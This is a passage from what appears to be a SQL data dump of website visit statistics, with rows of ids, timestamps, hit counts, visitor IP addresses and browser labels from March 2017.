'other'),(91949,1488846908,1,1,0,0,'188.163.77.32','chrome'),(91950,1488847482,1,1,0,0,'66.249.64.137','chrome'),(91951,1488847507,1,1,0,0,'51.255.65.52','other'),(91952,1488847730,1,1,0,0,'164.132.161.32','other'),(91953,1488847772,1,0,1,0,'66.249.64.79',''),(91954,1488848156,1,1,0,0,'164.132.161.2','other'),(91955,1488849359,2,2,0,0,'207.46.13.81','other'),(91956,1488850802,1,1,0,0,'51.15.10.29','chrome'),(91958,1488851186,2,2,0,0,'66.249.64.74','chrome'),(91959,1488851277,1,0,1,0,'66.249.64.69',''),(91960,1488851519,1,1,0,0,'164.132.161.95','other'),(91961,1488851550,1,1,0,0,'51.255.65.72','other'),(91962,1488851970,1,0,1,0,'66.249.64.137',''),(91963,1488852033,2,2,0,0,'151.80.44.115','other'),(91964,1488852143,2,2,0,0,'5.9.89.170','other'),(91965,1488856141,1,1,0,0,'83.170.203.142','other'),(91966,1488856415,1,1,0,0,'141.8.142.61','other'),(91967,1488856868,2,0,2,0,'66.249.64.79',''),(91968,1488857611,1,1,0,0,'207.46.13.79','other'),(91969,1488857736,1,1,0,0,'66.249.64.132','chrome'),(91970,1488858262,1,0,1,0,'66.249.64.137',''),(91971,1488858842,1,1,0,0,'66.249.64.69','chrome'),(91972,1488858874,1,1,0,0,'176.195.139.33','msie'),(91973,1488859517,1,1,0,0,'66.249.64.79','chrome'),(91974,1488859601,1,1,0,0,'51.255.65.6','other'),(91975,1488859626,1,1,0,0,'163.172.64.234','other'),(91976,1488859918,1,0,1,0,'66.249.64.142',''),(91977,1488861611,1,1,0,0,'180.76.15.152','other'),(91979,1488861763,1,0,1,0,'66.249.64.132',''),(91980,1488861861,1,1,0,0,'141.8.183.19','other'),(91981,1488864760,1,1,0,0,'157.55.39.156','other'),(91982,1488865140,1,1,0,0,'91.196.178.70','firefox'),(91983,1488865490,1,1,0,0,'51.255.65.79','other'),(91984,1488865664,1,0,1,0,'66.249.64.74',''),(91985,1488867171,1,1,0,0,'66.249.93.13','chrome'),(91986,1488867784,1,1,0,0,'141.8.183.25','other'),(91987,1488868665,1,1,0,0,'164.132.161.18','other'),(91988,1488868837,1,1,0,0,'178.92.152.253','chrome'),(91989,1488868871,1,1,0,0,'91.196.178.66','chrome'),(91990,1488868988,1,0,1,0,'66.249.64.137',''),(91991,1488869281,1,1,0,0,'46.164.130.92','firefox'),(91992,1488869294,1,1,0,0,'141.8.142.175','other'),(91993,1488869918,1,1,0,0,'164.132.161.80','other'),(91994,1488870267,1,0,1,0,'66.249.64.142',''),(91995,1488870356,1,1,0,0,'163.172.64.193','other'),(91996,1488871798,3,3,0,0,'107.150.59.98','other'),(91997,1488871875,1,1,0,0,'164.132.161.50','other'),(91998,1488872145,1,1,0,0,'91.196.178.71','chrome'),(91999,1488872197,1,1,0,0,'95.221.222.42','msie'),(92000,1488873060,1,0,1,0,'157.55.39.156',''),(92001,1488873299,1,1,0,0,'94.179.5.119','firefox'),(92002,1488873474,1,1,0,0,'180.76.15.162','other'),(92003,1488874149,1,1,0,0,'164.132.161.33','other'),(92004,1488874731,1,0,1,0,'66.249.64.69',''),(92005,1488875837,1,0,1,0,'66.249.64.69',''),(92006,1488876869,1,1,0,0,'46.219.253.56','chrome'),(92007,1488877766,1,1,0,0,'91.196.178.72','firefox'),(92008,1488877797,1,1,0,0,'163.172.69.178','other'),(92009,1488877817,1,1,0,0,'94.179.74.227','firefox'),(92010,1488877829,1,1,0,0,'46.48.13.161','chrome'),(92011,1488878155,1,1,0,0,'164.132.161.67','other'),(92012,1488878669,1,1,0,0,'46.219.253.56','chrome'),(92013,1488879265,1,1,0,0,'164.132.161.49','other'),(92014,1488879745,2,2,0,0,'199.58.86.206','other'),(92015,1488879951,1,0,1,0,'66.249.64.137',''),(92016,1488880472,1,1,0,0,'46.219.253.56','chrome'),(92017,1488880824,1,1,0,0,'212.26.136.202','firefox'),(92018,1488880935,1,1,0,0,'91.196.178.72','firefox'),(92019,1488881104,1,1,0,0,'164.132.161.2','other'),(92020,1488881533,3,3,0,0,'173.212.216.186','other'),(92021,1488881699,1,0,1,0,'66.249.64.132',''),(92022,1488881927,1,1,0,0,'91.196.178.66','msie'),(92023,1488881990,1,1,0,0,'51.255.65.48','other'),(92024,1488882120,1,1,0,0,'51.255.65.91','other'),(92025,1488882808,1,1,0,0,'46.219.253.56','chrome'),(92026,1488883238,1,0,1,0,'66.249.64.74',''),(92027,1488884532,1,1,0,0,'5.53.118.41','chrome'),(92028,1488884608,1,1,0,0,'46.219.253.56','chrome'),(92029,1488885779,1,1,0,0,'180.76.15.10','other'),(92030,1488885781,1,1,0,0,'180.76.15.157','other'),(92031,1488887077,1,0,1,0,'66.249.64.137',''),(92032,1488887112,1,1,0,0,'94.244.180.50','other'),(92033,1488887418,1,1,0,0,'163.172.73.28','other'),(92034,1488889393,2,2,0,0,'91.196.178.33','chrome'),(92035,1488889592,1,1,0,0,'46.219.253.56','chrome'),(92036,1488891391,1,1,0,0,'46.219.253.56','chrome'),(92037,1488891732,1,1,0,0,'193.194.127.217','firefox'),(92038,1488891810,1,1,0,0,'40.77.167.85','other'),(92039,1488892514,1,1,0,0,'163.172.64.199','other'),(92040,1488892556,1,1,0,0,'164.132.161.85','other'),(92041,1488892581,1,1,0,0,'164.132.161.47','other'),(92042,1488892866,1,1,0,0,'91.209.11.236','other'),(92043,1488893334,1,1,0,0,'164.132.161.77','other'),(92044,1488894500,1,1,0,0,'130.180.217.229','chrome'),(92045,1488894533,1,1,0,0,'130.193.50.34','other'),(92046,1488895304,1,1,0,0,'163.172.64.180','other'),(92047,1488896051,1,1,0,0,'91.196.178.66','chrome'),(92048,1488896992,1,1,0,0,'91.196.178.67','firefox'),(92049,1488898280,1,1,0,0,'163.172.64.249','other'),(92050,1488898826,1,1,0,0,'51.255.65.85','other'),(92051,1488899062,3,0,3,0,'68.180.229.99',''),(92052,1488901039,1,1,0,0,'164.132.161.35','other'),(92053,1488901781,1,1,0,0,'51.255.65.41','other'),(92054,1488902050,1,1,0,0,'91.196.178.165','chrome'),(92055,1488902706,1,1,0,0,'163.172.64.239','other'),(92056,1488903204,1,0,1,0,'66.249.64.183',''),(92057,1488903460,1,1,0,0,'51.255.65.8','other'),(92058,1488903735,1,1,0,0,'178.95.66.236','chrome'),(92059,1488903996,1,0,1,0,'66.249.64.79',''),(92060,1488904335,1,1,0,0,'51.255.65.77','other'),(92061,1488904381,1,0,1,0,'66.249.64.74',''),(92062,1488904438,1,1,0,0,'66.249.64.137','chrome'),(92063,1488904441,1,1,0,0,'66.249.64.79','chrome'),(92064,1488905435,1,0,1,0,'66.249.64.137',''),(92065,1488905560,1,1,0,0,'157.55.39.156','other'),(92066,1488906290,2,2,0,0,'37.55.225.177','firefox'),(92067,1488906735,1,1,0,0,'163.172.64.245','other'),(92068,1488907645,1,1,0,0,'163.172.64.241','other'),(92069,1488908290,1,1,0,0,'164.132.161.29','other'),(92070,1488908517,1,1,0,0,'164.132.161.36','other'),(92071,1488908660,1,1,0,0,'164.132.161.5','other'),(92072,1488909204,1,1,0,0,'164.132.161.34','other'),(92073,1488909708,1,1,0,0,'141.0.12.41','other'),(92074,1488909810,1,1,0,0,'163.172.64.189','other'),(92075,1488909977,1,1,0,0,'164.132.161.95','other'),(92076,1488910392,1,1,0,0,'51.255.65.10','other'),(92077,1488910507,1,1,0,0,'180.76.15.33','other'),(92078,1488910878,1,1,0,0,'141.8.183.25','other'),(92079,1488911819,1,1,0,0,'178.255.215.94','other'),(92080,1488912561,1,0,1,0,'66.249.64.183',''),(92081,1488912710,1,1,0,0,'51.255.65.93','other'),(92082,1488912949,1,1,0,0,'51.255.65.22','other'),(92083,1488913355,1,1,0,0,'164.132.161.57','other'),(92084,1488913640,1,1,0,0,'46.219.253.56','chrome'),(92085,1488914606,1,1,0,0,'163.172.64.179','other'),(92086,1488914903,1,1,0,0,'164.132.161.65','other'),(92087,1488915286,1,1,0,0,'109.63.227.8','msie'),(92088,1488916050,1,1,0,0,'164.132.161.36','other'),(92089,1488916247,1,1,0,0,'164.132.161.16','other'),(92090,1488917829,1,1,0,0,'188.244.47.215','chrome'),(92091,1488919706,1,1,0,0,'94.179.17.128','chrome'),(92092,1488920010,1,1,0,0,'89.178.91.242','chrome'),(92093,1488920487,2,2,0,0,'37.57.138.239','other'),(92094,1488920637,1,0,1,0,'66.249.64.69',''),(92095,1488921933,1,1,0,0,'130.193.51.19','other'),(92096,1488923299,1,1,0,0,'130.193.50.34','other'),(92097,1488923345,1,1,0,0,'141.8.142.58','other'),(92098,1488923685,1,1,0,0,'109.63.207.252','msie'),(92099,1488923890,1,1,0,0,'188.32.233.3','msie'),(92100,1488924239,1,1,0,0,'46.211.159.78','chrome'),(92101,1488925681,1,1,0,0,'109.173.58.72','other'),(92102,1488926029,1,1,0,0,'46.211.159.109','chrome'),(92103,1488926733,1,0,1,0,'66.249.64.187',''),(92104,1488930908,1,1,0,0,'46.48.13.161','chrome'),(92105,1488932047,1,1,0,0,'207.46.13.79','other'),(92106,1488932962,1,1,0,0,'163.172.64.233','other'),(92107,1488934387,1,0,1,0,'66.249.64.183',''),(92108,1488934550,1,1,0,0,'164.132.161.50','other'),(92109,1488935193,1,1,0,0,'51.255.65.37','other'),(92110,1488935615,1,1,0,0,'164.132.161.23','other'),(92111,1488936335,1,1,0,0,'141.8.132.10','other'),(92112,1488937100,1,1,0,0,'37.144.52.47','chrome'),(92113,1488937766,1,1,0,0,'178.137.83.166','chrome'),(92114,1488937803,1,1,0,0,'163.172.64.192','other'),(92115,1488938009,1,1,0,0,'164.132.161.47','other'),(92116,1488938495,1,1,0,0,'180.76.15.158','other'),(92117,1488939483,4,0,4,0,'68.180.229.99',''),(92118,1488940312,1,1,0,0,'51.255.65.22','other'),(92119,1488940330,1,1,0,0,'51.255.65.9','other'),(92120,1488940568,1,0,1,0,'68.180.229.99',''),(92121,1488940964,1,1,0,0,'51.255.65.89','other'),(92122,1488943492,1,1,0,0,'163.172.64.252','other'),(92123,1488944175,1,1,0,0,'5.255.253.67','other'),(92124,1488944181,1,1,0,0,'141.8.142.175','other'),(92125,1488945989,1,1,0,0,'180.76.15.13','other'),(92126,1488946424,1,1,0,0,'141.8.142.85','other'),(92127,1488946433,1,1,0,0,'130.193.51.14','other'),(92128,1488946451,1,1,0,0,'141.8.142.25','other'),(92129,1488947333,1,1,0,0,'164.132.161.19','other'),(92130,1488947764,2,2,0,0,'51.15.10.29','chrome'),(92131,1488947767,1,1,0,0,'163.172.64.239','other'),(92132,1488948217,2,2,0,0,'91.200.12.49','chrome'),(92133,1488948603,1,1,0,0,'51.255.65.15','other'),(92134,1488948699,1,1,0,0,'51.255.65.90','other'),(92135,1488948867,1,1,0,0,'164.132.161.63','other'),(92136,1488951188,1,0,1,0,'66.249.64.183',''),(92137,1488952326,1,1,0,0,'51.255.65.75','other'),(92138,1488953557,1,1,0,0,'130.193.51.43','other'),(92139,1488953566,1,1,0,0,'141.8.142.171','other'),(92140,1488953673,1,1,0,0,'163.172.64.249','other'),(92141,1488953762,1,0,1,0,'40.77.167.85',''),(92142,1488954631,2,2,0,0,'91.196.178.39','firefox'),(92143,1488954752,1,1,0,0,'66.249.93.156','chrome'),(92144,1488954809,1,1,0,0,'173.255.134.198','chrome'),(92145,1488954824,1,1,0,0,'136.243.152.18','other'),(92146,1488955064,1,1,0,0,'164.132.161.47','other'),(92147,1488955083,1,1,0,0,'51.255.65.90','other'),(92148,1488956210,1,1,0,0,'40.77.167.85','other'),(92149,1488956321,1,1,0,0,'51.255.65.53','other'),(92150,1488957275,1,1,0,0,'163.172.64.253','other'),(92151,1488957830,1,1,0,0,'66.249.64.59','chrome'),(92152,1488958311,1,1,0,0,'207.46.13.79','other'),(92153,1488958595,1,1,0,0,'164.132.161.25','other'),(92154,1488958699,1,1,0,0,'91.196.178.37','chrome'),(92155,1488959533,1,0,1,0,'40.77.167.129',''),(92156,1488959800,1,0,1,0,'66.249.64.179',''),(92157,1488960412,1,1,0,0,'164.132.161.37','other'),(92158,1488960660,1,1,0,0,'37.55.225.177','firefox'),(92159,1488960690,1,1,0,0,'51.255.65.77','other'),(92160,1488960697,1,1,0,0,'163.172.73.28','other'),(92161,1488961113,1,1,0,0,'66.102.9.29','chrome'),(92162,1488961720,1,1,0,0,'40.77.167.85','other'),(92163,1488962760,1,1,0,0,'51.255.65.48','other'),(92164,1488964639,1,1,0,0,'164.132.161.25','other'),(92165,1488965079,1,1,0,0,'164.132.161.68','other'),(92166,1488965439,1,0,1,0,'68.180.229.99',''),(92167,1488966531,1,1,0,0,'51.255.65.23','other'),(92168,1488966549,6,6,0,0,'130.193.50.34','other'),(92169,1488966565,3,3,0,0,'141.8.142.175','other'),(92170,1488966572,3,3,0,0,'141.8.142.58','other'),(92171,1488966620,1,1,0,0,'141.8.183.25','other'),(92172,1488966625,2,2,0,0,'130.193.51.19','other'),(92173,1488966629,2,2,0,0,'141.8.142.67','other'),(92174,1488969029,1,1,0,0,'51.255.65.52','other'),(92175,1488969536,1,1,0,0,'163.172.64.185','other'),(92176,1488971204,1,1,0,0,'51.255.65.3','other'),(92177,1488971222,2,2,0,0,'46.165.197.142','other'),(92178,1488971932,1,0,1,0,'66.249.64.61',''),(92179,1488971983,1,1,0,0,'164.132.161.40','other'),(92180,1488972172,1,1,0,0,'207.46.13.81','other'),(92181,1488972984,1,1,0,0,'51.255.65.14','other'),(92182,1488973028,1,1,0,0,'91.196.178.163','chrome'),(92183,1488973760,1,1,0,0,'51.255.65.50','other'),(92184,1488973840,1,1,0,0,'207.46.13.79','other'),(92185,1488974373,1,0,1,0,'66.249.64.132',''),(92186,1488974812,1,0,1,0,'66.249.64.57',''),(92187,1488974905,1,1,0,0,'66.249.64.61','chrome'),(92188,1488976797,1,1,0,0,'164.132.161.22','other'),(92189,1488978600,1,1,0,0,'180.76.15.9','other'),(92190,1488978773,1,1,0,0,'40.77.167.85','other'),(92191,1488980093,1,0,1,0,'207.46.13.79',''),(92192,1488980484,1,1,0,0,'51.255.65.48','other'),(92193,1488980940,1,1,0,0,'164.132.161.42','other'),(92194,1488980951,1,1,0,0,'164.132.161.61','other'),(92195,1488982324,1,1,0,0,'163.172.64.184','other'),(92196,1488982862,1,1,0,0,'46.211.70.29','chrome'),(92197,1488982942,1,0,1,0,'66.249.64.132',''),(92198,1488983083,2,2,0,0,'91.200.12.49','chrome'),(92199,1488983329,1,1,0,0,'164.132.161.94','other'),(92200,1488983362,2,2,0,0,'51.15.10.29','chrome'),(92201,1488983654,2,2,0,0,'94.179.75.124','chrome'),(92202,1488984367,1,1,0,0,'163.172.64.250','other'),(92203,1488984738,1,1,0,0,'51.255.65.58','other'),(92204,1488984786,1,0,1,0,'66.249.64.183',''),(92205,1488985341,1,0,1,0,'40.77.167.129',''),(92206,1488985632,1,1,0,0,'94.179.13.98','firefox'),(92207,1488987606,1,0,1,0,'66.249.64.187',''),(92208,1488987789,1,0,1,0,'66.249.64.57',''),(92209,1488990201,1,1,0,0,'141.8.142.175','other'),(92210,1488990818,1,1,0,0,'66.249.64.59','chrome'),(92211,1488992243,2,2,0,0,'51.255.65.49','other'),(92212,1488992338,1,1,0,0,'163.172.64.238','other'),(92213,1488993260,1,0,1,0,'207.46.13.79',''),(92214,1488995345,1,1,0,0,'94.179.123.54','chrome'),(92215,1488995857,1,1,0,0,'163.172.64.253','other'),(92216,1488995882,1,0,1,0,'66.249.64.74',''),(92217,1488995982,1,1,0,0,'163.172.64.190','other'),(92218,1488997030,1,0,1,0,'66.249.64.179',''),(92219,1488997497,1,1,0,0,'164.132.161.13','other'),(92220,1488997686,1,1,0,0,'91.211.213.28','firefox'),(92221,1488998340,1,1,0,0,'163.172.73.28','other'),(92222,1488998370,1,0,1,0,'66.249.64.187',''),(92223,1488998927,1,0,1,0,'66.249.64.179',''),(92224,1488999236,1,0,1,0,'66.249.64.74',''),(92225,1488999276,1,1,0,0,'164.132.161.36','other'),(92226,1488999416,1,1,0,0,'164.132.161.4','other'),(92227,1488999797,1,1,0,0,'83.22.117.207','chrome'),(92228,1489001320,1,1,0,0,'163.172.64.181','other'),(92229,1489001748,1,0,1,0,'66.249.64.183',''),(92230,1489002778,1,1,0,0,'51.255.65.97','other'),(92231,1489002903,1,1,0,0,'51.255.65.79','other'),(92232,1489004132,1,0,1,0,'68.180.229.99',''),(92233,1489005033,1,1,0,0,'164.132.161.25','other'),(92234,1489005739,1,1,0,0,'164.132.161.28','other'),(92235,1489006453,1,0,1,0,'66.249.64.202',''),(92236,1489007182,1,1,0,0,'176.195.118.70','opera'),(92237,1489008493,1,1,0,0,'51.255.65.75','other'),(92238,1489009095,1,1,0,0,'130.180.216.89','firefox'),(92239,1489009279,1,1,0,0,'31.43.162.220','chrome'),(92240,1489009877,1,1,0,0,'130.180.216.58','firefox'),(92241,1489010988,1,1,0,0,'46.48.13.161','chrome'),(92242,1489012856,1,1,0,0,'163.172.64.249','other'),(92243,1489012885,1,1,0,0,'157.55.39.152','other'),(92244,1489014242,1,1,0,0,'51.255.65.49','other'),(92245,1489014776,1,1,0,0,'164.132.161.34','other'),(92247,1489015223,1,1,0,0,'51.255.65.67','other'),(92248,1489016017,1,0,1,0,'40.77.167.85',''),(92249,1489016111,1,1,0,0,'51.255.65.75','other'),(92250,1489019028,1,1,0,0,'164.132.161.42','other'),(92251,1489020082,1,1,0,0,'51.255.65.57','other'),(92252,1489020243,1,1,0,0,'51.255.65.7','other'),(92253,1489021687,1,0,1,0,'66.249.64.115',''),(92254,1489022809,1,1,0,0,'164.132.161.27','other'),(92255,1489024272,1,0,1,0,'68.180.229.99',''),(92256,1489024901,1,1,0,0,'164.132.161.69','other'),(92257,1489027427,1,0,1,0,'66.249.64.246',''),(92258,1489027845,1,1,0,0,'130.193.50.34','other'),(92259,1489028246,1,1,0,0,'51.255.65.84','other'),(92260,1489029613,1,1,0,0,'51.255.65.45','other'),(92261,1489030818,1,1,0,0,'164.132.161.63','other'),(92262,1489034021,1,0,1,0,'66.249.64.183',''),(92263,1489034684,1,0,1,0,'66.249.64.179',''),(92264,1489035319,1,0,1,0,'66.249.64.187',''),(92265,1489037056,1,1,0,0,'164.132.161.29','other'),(92266,1489037256,1,1,0,0,'176.15.200.176','chrome'),(92267,1489037574,1,1,0,0,'51.255.65.61','other'),(92268,1489037892,1,1,0,0,'91.196.178.71','firefox'),(92269,1489038858,1,1,0,0,'163.172.64.250','other'),(92270,1489038955,1,1,0,0,'180.76.15.24','other'),(92271,1489039798,1,1,0,0,'176.109.201.15','firefox'),(92272,1489040294,1,1,0,0,'91.196.178.72','firefox'),(92273,1489040988,1,0,1,0,'66.249.64.183',''),(92274,1489040994,1,1,0,0,'51.255.65.94','other'),(92275,1489041223,1,1,0,0,'163.172.64.230','other'),(92276,1489041372,1,1,0,0,'34.207.97.41','other'),(92277,1489041501,3,3,0,0,'92.238.226.245','other'),(92278,1489041518,1,1,0,0,'66.249.93.13','chrome'),(92279,1489042119,1,1,0,0,'163.172.64.217','other'),(92280,1489042824,1,1,0,0,'91.196.178.67','firefox'),(92281,1489042991,1,1,0,0,'91.196.178.72','firefox'),(92282,1489043027,1,1,0,0,'207.46.13.169','other'),(92283,1489044253,1,1,0,0,'82.207.91.234','firefox'),(92284,1489044410,1,1,0,0,'91.196.178.72','firefox'),(92285,1489044948,1,1,0,0,'64.246.187.42','firefox'),(92286,1489045385,1,1,0,0,'91.196.178.68','chrome'),(92287,1489045427,1,1,0,0,'51.255.65.29','other'),(92288,1489045979,1,1,0,0,'66.249.64.179','chrome'),(92289,1489045988,1,1,0,0,'66.249.64.74','chrome'),(92290,1489046055,1,1,0,0,'91.196.178.165','chrome'),(92291,1489046285,1,1,0,0,'163.172.71.13','other'),(92292,1489046398,1,1,0,0,'91.196.178.72','firefox'),(92293,1489046424,1,1,0,0,'92.113.3.194','chrome'),(92294,1489046447,1,1,0,0,'51.255.65.43','other'),(92295,1489046615,1,1,0,0,'31.13.102.96','other'),(92296,1489046623,1,1,0,0,'31.13.112.118','other'),(92297,1489046865,1,1,0,0,'91.196.178.66','firefox'),(92298,1489046879,1,1,0,0,'91.196.177.15','chrome'),(92299,1489048001,1,1,0,0,'91.196.178.67','chrome'),(92300,1489048025,1,1,0,0,'130.193.51.19','other'),(92301,1489048421,1,1,0,0,'46.211.120.51','chrome'),(92302,1489048597,1,1,0,0,'46.219.253.56','chrome'),(92303,1489049155,1,1,0,0,'91.196.177.46','chrome'),(92304,1489049976,1,1,0,0,'164.132.161.22','other'),(92305,1489050397,1,1,0,0,'46.219.253.56','chrome'),(92306,1489050855,1,1,0,0,'141.8.183.19','other'),(92307,1489050878,1,1,0,0,'178.154.189.37','other'),(92308,1489051356,1,1,0,0,'164.132.161.85','other'),(92309,1489051859,2,2,0,0,'91.196.178.72','firefox'),(92310,1489052198,1,1,0,0,'46.219.253.56','chrome'),(92311,1489052569,1,1,0,0,'164.132.161.74','other'),(92312,1489053860,1,1,0,0,'130.180.211.31','chrome'),(92313,1489053911,1,1,0,0,'141.8.142.206','other'),(92314,1489053997,1,1,0,0,'46.219.253.56','chrome'),(92315,1489054165,1,1,0,0,'95.135.212.41','chrome'),(92316,1489054795,1,1,0,0,'78.111.190.166','firefox'),(92317,1489054900,1,1,0,0,'168.235.200.160','other'),(92318,1489055217,1,1,0,0,'163.172.64.253','other'),(92319,1489055309,1,1,0,0,'91.196.178.168','chrome'),(92320,1489055797,1,1,0,0,'46.219.253.56','chrome'),(92321,1489055822,1,1,0,0,'164.132.161.90','other'),(92322,1489055960,1,1,0,0,'51.255.65.52','other'),(92323,1489056217,1,1,0,0,'180.76.15.21','other'),(92324,1489056929,1,1,0,0,'51.255.65.53','other'),(92325,1489056989,1,1,0,0,'163.172.64.230','other'),(92326,1489057004,1,1,0,0,'91.196.178.67','firefox'),(92327,1489057598,1,1,0,0,'46.219.253.56','chrome'),(92328,1489058649,1,1,0,0,'91.196.178.165','chrome'),(92329,1489058784,1,1,0,0,'51.255.65.26','other'),(92330,1489058841,1,1,0,0,'163.172.64.225','other'),(92331,1489058867,1,1,0,0,'91.196.178.69','firefox'),(92332,1489059272,1,1,0,0,'91.196.178.129','firefox'),(92333,1489059397,1,1,0,0,'46.219.253.56','chrome'),(92334,1489059990,1,1,0,0,'91.209.11.236','other'),(92335,1489060395,1,0,1,0,'66.249.64.183',''),(92336,1489060671,1,1,0,0,'78.111.186.104','chrome'),(92337,1489061198,1,1,0,0,'46.219.253.56','chrome'),(92338,1489061733,1,0,1,0,'207.46.13.169',''),(92339,1489061899,1,1,0,0,'193.194.127.217','firefox'),(92340,1489062289,1,1,0,0,'51.255.65.68','other'),(92341,1489062998,1,1,0,0,'46.219.253.56','chrome'),(92342,1489063078,1,1,0,0,'31.41.89.209','opera'),(92343,1489063357,2,0,2,0,'66.249.64.179',''),(92344,1489063588,1,1,0,0,'163.172.71.21','other'),(92345,1489063802,1,1,0,0,'51.255.65.85','other'),(92346,1489064172,1,1,0,0,'164.132.161.95','other'),(92347,1489064330,1,1,0,0,'178.154.189.31','other'),(92348,1489064334,1,1,0,0,'141.8.142.25','other'),(92349,1489064387,1,1,0,0,'94.179.100.207','chrome'),(92350,1489064798,1,1,0,0,'46.219.253.56','chrome'),(92351,1489065304,1,1,0,0,'91.196.178.66','other'),(92352,1489065855,1,0,1,0,'66.249.64.74',''),(92353,1489066349,1,1,0,0,'91.196.178.129','firefox'),(92354,1489066494,2,2,0,0,'141.8.142.85','other'),(92355,1489066524,4,4,0,0,'130.193.51.19','other'),(92356,1489066552,1,1,0,0,'93.158.152.61','other'),(92357,1489066591,4,4,0,0,'141.8.183.25','other'),(92358,1489066597,1,1,0,0,'46.219.253.56','chrome'),(92359,1489066610,1,1,0,0,'93.158.152.51','other'),(92360,1489066621,1,1,0,0,'93.158.152.40','other'),(92361,1489066624,1,1,0,0,'130.193.50.32','other'),(92362,1489066634,1,1,0,0,'130.193.51.14','other'),(92363,1489066661,1,1,0,0,'141.8.142.58','other'),(92364,1489066675,1,1,0,0,'141.8.132.30','other'),(92365,1489066679,1,1,0,0,'130.193.50.38','other'),(92366,1489066704,3,3,0,0,'5.255.253.67','other'),(92367,1489066714,1,1,0,0,'141.8.142.61','other'),(92368,1489066723,4,4,0,0,'178.154.149.10','other'),(92369,1489066752,2,2,0,0,'141.8.142.67','other'),(92370,1489066756,1,1,0,0,'141.8.132.52','other'),(92371,1489066772,2,2,0,0,'141.8.142.25','other'),(92372,1489066791,1,1,0,0,'141.8.132.41','other'),(92373,1489066823,2,2,0,0,'130.193.50.4','other'),(92374,1489066827,1,1,0,0,'93.158.152.9','other'),(92375,1489066849,1,1,0,0,'178.154.189.31','other'),(92376,1489066853,1,1,0,0,'5.255.253.47','other'),(92377,1489067180,1,0,1,0,'66.249.64.79',''),(92378,1489067280,2,2,0,0,'91.196.178.165','chrome'),(92379,1489067788,2,2,0,0,'91.196.178.68','chrome'),(92380,1489067996,1,1,0,0,'176.32.7.83','chrome'),(92381,1489068001,1,1,0,0,'164.132.161.12','other'),(92382,1489068397,1,1,0,0,'46.219.253.56','chrome'),(92383,1489068946,1,1,0,0,'91.196.178.72','firefox'),(92384,1489069075,1,1,0,0,'94.179.26.227','firefox'),(92385,1489069384,1,1,0,0,'31.43.5.118','chrome'),(92386,1489069518,1,1,0,0,'51.255.65.26','other'),(92387,1489069663,1,1,0,0,'51.255.65.21','other'),(92388,1489069673,1,1,0,0,'91.196.178.165','chrome'),(92389,1489069856,1,1,0,0,'92.112.14.26','chrome'),(92390,1489069962,1,1,0,0,'93.158.152.46','other'),(92391,1489070765,1,1,0,0,'164.132.161.88','other'),(92392,1489070792,1,1,0,0,'91.196.178.71','firefox'),(92393,1489070965,1,1,0,0,'51.255.65.54','other'),(92394,1489071098,1,1,0,0,'46.219.253.56','chrome'),(92395,1489072405,1,1,0,0,'91.233.127.4','chrome'),(92396,1489072898,1,1,0,0,'46.219.253.56','chrome'),(92397,1489073302,1,1,0,0,'91.196.177.46','firefox'),(92398,1489074698,1,1,0,0,'46.219.253.56','chrome'),(92399,1489074839,1,1,0,0,'163.172.64.184','other'),(92400,1489075001,1,1,0,0,'91.196.178.39','firefox'),(92401,1489075408,1,0,1,0,'66.249.64.187',''),(92402,1489076259,1,0,1,0,'66.249.64.183',''),(92403,1489076282,1,1,0,0,'163.172.64.229','other'),(92404,1489076498,1,1,0,0,'46.219.253.56','chrome'),(92405,1489076574,1,1,0,0,'51.255.65.51','other'),(92406,1489076907,1,1,0,0,'51.255.65.22','other'),(92407,1489077432,1,1,0,0,'130.180.217.253','chrome'),(92408,1489078516,1,1,0,0,'164.132.161.86','other'),(92409,1489079224,1,1,0,0,'37.52.20.53','chrome'),(92410,1489079376,1,1,0,0,'37.54.20.67','chrome'),(92411,1489079414,1,0,1,0,'66.249.64.183',''),(92412,1489079520,1,1,0,0,'164.132.161.64','other'),(92413,1489080539,1,1,0,0,'164.132.161.16','other'),(92414,1489080681,1,1,0,0,'164.132.161.5','other'),(92415,1489080863,1,1,0,0,'94.178.6.44','chrome'),(92416,1489081511,1,1,0,0,'78.111.185.86','chrome'),(92417,1489081814,1,1,0,0,'91.209.11.236','other'),(92418,1489081838,1,1,0,0,'40.77.167.18','other'),(92419,1489081941,1,1,0,0,'164.132.161.68','other'),(92420,1489082437,1,1,0,0,'51.255.65.61','other'),(92421,1489082846,1,0,1,0,'66.249.64.187',''),(92422,1489083985,1,0,1,0,'66.249.64.187',''),(92423,1489084000,1,1,0,0,'51.255.65.91','other'),(92424,1489084327,1,0,1,0,'66.249.64.69',''),(92425,1489085222,1,1,0,0,'164.132.161.69','other'),(92426,1489085766,1,1,0,0,'130.193.50.34','other'),(92427,1489086606,1,1,0,0,'194.44.133.177','chrome'),(92428,1489087867,1,1,0,0,'91.196.178.165','chrome'),(92429,1489088541,1,1,0,0,'164.132.161.82','other'),(92430,1489088794,1,1,0,0,'163.172.64.193','other'),(92431,1489089358,1,1,0,0,'163.172.71.29','other'),(92432,1489089775,1,1,0,0,'164.132.161.82','other'),(92433,1489090832,1,1,0,0,'51.255.65.80','other'),(92434,1489091077,1,1,0,0,'164.132.161.36','other'),(92435,1489091243,1,1,0,0,'51.255.65.75','other'),(92436,1489092009,1,1,0,0,'164.132.161.64','other'),(92437,1489092025,1,1,0,0,'195.245.112.168','chrome'),(92438,1489092302,1,1,0,0,'93.158.152.84','other'),(92439,1489093480,1,0,1,0,'66.249.64.69',''),(92440,1489093771,1,1,0,0,'40.77.167.72','other'),(92441,1489094108,1,1,0,0,'164.132.161.94','other'),(92442,1489095276,1,1,0,0,'163.172.64.231','other'),(92443,1489095642,1,1,0,0,'164.132.161.52','other'),(92444,1489096937,1,1,0,0,'51.255.65.94','other'),(92445,1489096948,1,1,0,0,'40.77.167.15','other'),(92446,1489098834,1,1,0,0,'163.172.64.232','other'),(92447,1489099481,1,1,0,0,'163.172.64.242','other'),(92448,1489102274,1,1,0,0,'157.55.39.165','other'),(92449,1489105027,1,1,0,0,'163.172.64.244','other'),(92450,1489105096,1,1,0,0,'51.255.65.37','other'),(92451,1489107465,1,1,0,0,'164.132.161.52','other'),(92452,1489107732,1,1,0,0,'51.255.65.76','other'),(92453,1489107879,1,0,1,0,'66.249.64.119',''),(92454,1489108552,1,0,1,0,'66.249.64.74',''),(92455,1489109084,1,1,0,0,'51.255.65.62','other'),(92456,1489111420,1,0,1,0,'66.249.64.183',''),(92457,1489111625,1,1,0,0,'180.76.15.144','other'),(92458,1489111783,1,1,0,0,'46.48.13.161','chrome'),(92459,1489112699,1,1,0,0,'51.255.65.51','other'),(92460,1489114331,1,1,0,0,'164.132.161.57','other'),(92461,1489117646,1,1,0,0,'164